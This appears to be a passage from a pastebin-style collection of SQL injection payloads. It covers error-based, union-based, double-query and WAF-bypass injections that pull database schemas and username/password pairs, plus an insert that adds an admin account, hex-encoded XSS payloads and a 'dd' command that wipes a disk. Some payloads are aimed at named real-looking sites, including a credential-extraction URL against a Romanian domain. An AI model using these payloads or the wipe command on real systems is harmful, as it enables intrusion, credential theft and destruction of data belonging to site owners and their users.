- from information_schema.tables where
- table_schema=database() limit 0,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a)
- Double Query for Database Extraction:
- and(select 1 from(select count(*),concat((select
- (select concat(0x7e,0×27,cast(database() as
- char),0×27,0x7e)) from information_sch
- ema.tables limit 0,1),floor(rand(0)*2))x from
- information_schema.tables group by x)a) and 1=1
- and(select 1 from(select count(*),concat((select
- (select (SELECT distinct
- concat(0x7e,0×27,cast(schema_name as
- char),0×27,0x7e) FROM information_sch
- ema.schemata LIMIT N,1)) from
- information_schema.tables limit 0,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a) and 1=1
- and(select 1 from(select count(*),concat((select
- (select (SELECT distinct
- concat(0x7e,0×27,cast(table_name as
- char),0×27,0x7e) FROM information_sch
- ema.tables Where
- table_schema=0xhex_code_of_database_name
- LIMIT N,1)) from information_schema.tables limit
- 0,1),floor(rand(0)*2))x from
- information_schema.tables group by x)a) and 1
- ==============================
- ==============================
- ==============================
- =========================================
- WUBI +and+extractvalue(rand(),concat(0x3e,
- (select+concat(username,0x7e,password)+from
- +iw_users+limit+0,1)))–+
- ==============================
- ==============================
- ==============================
- =========================================
- Descarci orice linux live, bootezi dupa el si
- formatezi cu dd+urandom. De acolo nu mai
- recupereaza NIMENI ceva.
- Code: dd if=/dev/urandom of=/dev/sda bs=1M
- I’d say using concat(0xY)
- Y being ‘<script>alert(‘Text here’);</script>’ in
- hex
- union select concat(version,0x3c73637269707
- 43e616c6572742827706833776c272
- 93c2f7363726970743e)
- http://zerocoolhf.altervista.org/level2.php?id=-1
- %27%20union%20select%20*%20from
- %28%28select%201%29a%20join%20%28select
- %20version%28%29%29b%20join%20%28select
- %20database%28%29%29c%29 –+
- union select 1,group_concat(column_name),3
- FROM information_schema.columns WHERE
- table_name=concat(’0x’, hex(‘users’)
- =113′+and+0+union+select+1,(SELECT (@)
- FROM (SELECT(@:=0×00),(SELECT (@) FROM
- (information_schema.columns) WHERE
- (table_schema>=@) AND (@)IN (@:=CONCAT
- (@,0x3C7363726970743E616C6572742827
- ,’ [ ',table_schema,' ] >’,table_name,’ >
- ‘,column_name,0x27293B3C2F7363
- 726970743E))))x),3–+–
- injection in sql database addd new user
- INSERT INTO admins (`name`,`password`,`email`)
- VALUES (‘unix’,'unixunix’,'unix_chro@
- yahoo.com’)
- +and+(select+1+from+(select+count(*),concat((
- select(select+concat(cast(table_nam e+as
- +char),0x7e))+from+information_schema.tables
- +where+table_schema=0xDATABASEHE X+limit
- +0,1),floor(rand(0)*2))x+from+informat
- ion_schema.tables+group+by+x)a)
- CHALLENGES
- Code:
- =(13)and(0)union(select(1),group_concat(colum
- n_name,0x3c62723e),(3)from(inf
- ormation_schema.columns)where(
- table_schema=database())and(ta
- ble_name=0×7365637572697479))–+-
- =12+and+false/*!union*/ /*!select*/
- 1,group_concat(0x3c62723e,/*!TabLe_NaMe*/
- ),2,concat(user(),0x2a,database(),0x2a,version
- ()),13,0x3c666f6e7420636f6c6f7
- 23d626c75653e3c68323e706833776c,15 from
- information_schema.tables where
- table_schema=0x66616272697a696
- f5f636572697070 LiMit 0,1–
- =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version
- (),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!
- fRoM*/ security–
- =121)+and(0)+/*!uNion*/+/*!seleCt*/
- +1,2,3,4,version(),6,7– -
- =121)/**/and false UNION(SELECT
- 1,2,3,4,5,6,7)–+-
- =121 div 0 ) /*!UNION*/ /*!SELECT*/
- 1,2,3,4,5,6,version()# |
- null’+union+select+1,2,count(schema_name),4,5
- +from+information_schema.schemata– x
- ==============================
- ==============================
- ==============================
- =========================================
- Error Based:
- ==============================
- ==============================
- ==============================
- =========================================
- +or+1+group+by+concat_ws(0x7e,version(),floor
- (rand(0)*2))+having+min(0)+or+1–
- or 1 group by concat(0x3a,(select substr
- (group_concat(username,0x3a,password),1,150)
- from rmdsz_user),floor(rand(0)*2)) having min(0)
- or 1– -
- or 1 group by concat_ws(0x7e,version(),floor
- (rand(0)*2)) having min(0) or 1 — -
- and (select 1 from (select count(*),concat((select
- (select concat(cast(database() as char),0x7e))
- from information_schema.tables where
- table_schema=database() limit 0,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a)
- +AND(SELECT COUNT(*) FROM (SELECT 1 UNION
- SELECT null UNION SELECT !1)x GROUP by
- CONCAT((SELECT version() FROM
- information_schema.tables LIMIT 0,1),FLOOR
- (RAND(0)*2)))
- +and+(select+1+from+(select+count(*)+from+(se
- lect+1+union+select+2+union+select+ 3)x+group
- +by+concat(mid((select+concat_ws(0x7
- e,version(),0x7e)+from+information_
- schema.tables+limit+0,1),1,25),floor(rand(0)*
- 2)))a)– x
- or 1=convert(int,(@@version))-
- +or+1+group+by+concat_ws(0x7e,version(),floor
- (rand(0)*2))+having+min(0)+or+1–
- +and+(select+1+from+(select+count(*),concat((
- select(select+concat(c ast(count(schem
- a_name)+as+char),0x7e))+from+i
- nformation_schema.schemata+limit+0, 1),floor
- (rand(0)*2))x+from+information_schema.tables
- +group+by+x)a)
- (42)and(0)union(select(1),2,version(),4,5,0x3
- c623e3c666f6e7420636f6c6f723d6
- 26c75653e706833776c,7,8,9,(10))–+-
- ==============================
- ==============================
- ==============================
- =========================================
- WAF BYPASS BY TOTTI
- ==============================
- ==============================
- ==============================
- =========================================
- =-2/*1337*/UNION/*1337*/(SELECT/*1337*/
- 1337,concat_ws(0x203a20,0x746f7
- 474693933,table_nam e)/*1337*/FROM/*1337*/
- INFORMATION_SCHEMA./*!TABLES*//*1337*/
- WHERE/*1337*/TABLE_SCHEMA=database())– -
- =2+and(0)+union+distinctROW+select+1,/*!
- 50000CoNcaT*/(0x706833776c,0x
- 3a,table_name) /*!froM*/ /*!InfORmaTion_sc
- Hema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/
- =database()– -
- ==============================
- ==============================
- ==============================
- =========================================
- WUBI – 1,(select(@x)from(select(@x:=0×00),
- (select(0)from(information_schema.column
- s)where(table_schema!=0×69)and(0×00)in
- (@x:=concat(@x,0x3c62723e,table_schem
- a,0x2020203d3e3e202020,table_n
- ame,0x20203a3a3a32020,column_n
- ame))))x),3,4–
- (select (@) from (select(@:=0×00),(select (@)
- from (information_schema.columns) where
- (table_schema>=@) and (@)in (@:=concat(@,0x
- 0a,’ [ ',table_schema,' ] >’,table_name,’ >
- ‘,column_name))))x)
- (select (@) from (select (@x:=0×00),(select (@)
- from (database.table) where (@) in (@:=concat
- (@,0x0a,columns)))x)
- (select (@) from (select (@x:=0×00),(select (@)
- from (database.table) where (@) in (@:=concat
- (@,0x0a,columns)))x)
- ==============================
- ==============================
- ==============================
- =========================================
- +and+1=convert(int,SERVERPROPERTY
- (‘ProductVersion’))
- ==============================
- ==============================
- ==============================
- =========================================
- http://zerofreak.blogspot.it/2012/02/tutorial-by-
- zer0freak-zer0freak-sqli.html
- http://www.websec.ca/kb/sql_injection
- http://www.hellboundhackers.org/articles/862-
- mysql-injection-complete-tutorial.html
- ==============================
- ==============================
- ==============================
- =========================================
- test
- http://www.mt.ro/nou/articol.php?id=-
- angajari’+and+extractvalue(rand(),concat(0x3e,
- (select+concat(username,0x7e,password)+from
- +iw_users+limit+0,1)))–+
Add Comment
Please, Sign In to add comment